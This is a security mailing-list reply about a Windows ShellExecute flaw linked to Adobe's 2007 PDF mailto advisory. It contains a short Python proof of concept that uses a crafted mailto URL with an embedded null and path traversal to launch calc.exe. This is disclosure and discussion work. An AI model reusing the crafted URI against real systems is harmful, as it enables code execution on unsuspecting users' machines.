Re: Adobe confirms critical vulnerability after a remarkable delay

[rms () computerbytesman com]

Hi,

BTW, it is the ShellExecute Win32 function that is busted.  The attached
Python test program runs the Windows calculator on my system with IE7
installed.  ShellExecute should either return an error or run the default
email reader.  This security problem will affect programs that use
ShellExecute with a user supplied URL.

The problem here is Windows gets confused by an embedded null and double
quotes in a URL and does the wrong thing.

This doesn't feel like the same bug as the IE7/Firefox problem that
surfaced in July which was a problem with quoting URLs on command lines.

Richard

================================================

import win32api

def main():
        win32api.ShellExecute(0, "open" ,
'mailto:test%00../../../../windows/system32/calc.exe".cmd' , "" , "." ,
0)
        return

main()

================================================
> Adobe has provided information with a workaround related to critical code
> execution vulnerability reported by Mr. Petko D. Petkov (aka pdp) on 20 th
> Sep.
>
> http://www.gnucitizen.org/blog/0day-pdf-pwns-windows
>
> That was almost three weeks ago...
>
> The following advisory title states affected Acrobat versions:
> Workaround available for vulnerability in versions 8.1 and earlier of
> Adobe Reader and Acrobat
> http://www.adobe.com/support/security/advisories/apsa07-04.html
>
> Go and backup your registry and apply these changes!
>
> Red Hat has officially informed Linux versions are not vulnerable.
>
> - Juha-Matti
> _______________________________________________
> Fun and Misc security discussion for OT posts.
> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
> Note: funsec is a public and open mailing list.

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.